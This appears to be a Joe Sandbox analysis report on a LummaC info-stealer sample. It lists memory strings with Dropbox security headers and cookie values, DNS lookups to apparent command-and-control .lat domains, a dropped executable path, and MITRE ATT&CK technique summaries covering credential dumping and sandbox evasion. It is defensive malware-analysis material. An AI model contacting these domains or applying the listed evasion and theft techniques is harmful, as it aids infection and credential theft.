Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: BbL7Kk--DiFi

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://.dropbox.com ; font-src https:// data: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-X1KwI/UNPmezMmfjcL61khhQ7Rs=' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: equals www.yahoo.com (Yahoo)
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: X-Dropbox-Request-Id6d48777500054d1cb3bb2adc4a7563d4X-Dropbox-Response-Originfar_remoteX-Xss-Protection1; mode=blockX-Robots-Tagnoindex, nofollow, noimageindexX-Permitted-Cross-Domain-PoliciesnoneX-Content-Type-OptionsnosniffReferrer-Policystrict-origin-when-cross-originContent-Security-Policyreport-uri https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic ; script-src 'unsafe-eval' 'strict-dynamic' 'nonce-X1KwI/UNPmezMmfjcL61khhQ7Rs=' 'nonce-OStYmpUFa+BgWTS3CQa6DrbepSM='Content-Security-Policychild-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://.dropbox.com ; font-src https:// data: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-X1KwI/UNPmezMmfjcL61khhQ7Rs=' ; frame-
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: child-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://.dropbox.com ; font-src https:// data: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-X1KwI/UNPmezMmfjcL61khhQ7Rs=' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: equals www.yahoo.com (Yahoo)
Source: k7h8uufe6Y.exe, 00000000.00000003.2115356579.0000000003B99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://.dropbox.com ; font-src https:// data: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-X1KwI/UNPmezMmfjcL61khhQ7Rs=' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: equals www.yahoo.com (Yahoo)
Source: k7h8uufe6Y.exe, 00000000.00000003.2115356579.0000000003B99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://.dropbox.com ; font-src https:// data: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-X1KwI/UNPmezMmfjcL61khhQ7Rs=' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss:Persistent-AuthWWW-AuthenticateVarylocale=en; Path=/; Domain=dropbox.com; Expires=Sun, 13 Jan 2030 07:55:44 GMT__Host-ss=T5SrY5o4DI; Path=/; Expires=Wed, 14 Jan 2026 07:55:44 GMT; HttpOnly; Secure; SameSite=Strict__Host-js_csrf=s2DJXLqADaaq-43CfIqUtgad; Path=/; Expires=Wed, 14 Jan 2026 07:55:44 GMT; Secure; SameSite=Nonet=s2DJXLqADaaq-43CfIqUtgad; Path=/; Domain=dropbox.com; Expires=Wed, 14 Jan 2026 07:55:44 GMT; HttpOnly; Secure; SameSite=Nonegvc=MjcxNjM4MTYxMzU3MTgzODIwMTkyNTczMDEzODAyNzQ0NjI5NDMz; Path=/; Expires=Sun, 13 Jan 2030 07:55:44 GM
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: u: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://.dropbox.com ; font-src https:// data: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-X1KwI/UNPmezMmfjcL61khhQ7Rs=' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: shoefeatthe.lat
Source: global traffic	DNS traffic detected: DNS query: bloodyswif.lat
Source: global traffic	DNS traffic detected: DNS query: washyceehsu.lat
Source: global traffic	DNS traffic detected: DNS query: leggelatez.lat
Source: global traffic	DNS traffic detected: DNS query: miniatureyu.lat
Source: global traffic	DNS traffic detected: DNS query: kickykiduz.lat
Source: global traffic	DNS traffic detected: DNS query: savorraiykj.lat
Source: global traffic	DNS traffic detected: DNS query: finickypwk.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: aleksandr-block.com
Source: global traffic	DNS traffic detected: DNS query: www.dropbox.com
Source: global traffic	DNS traffic detected: DNS query: ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report k7h8uufe6Y.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\VMB7R5ASJ9ZHN3G5.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
k7h8uufe6Y.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre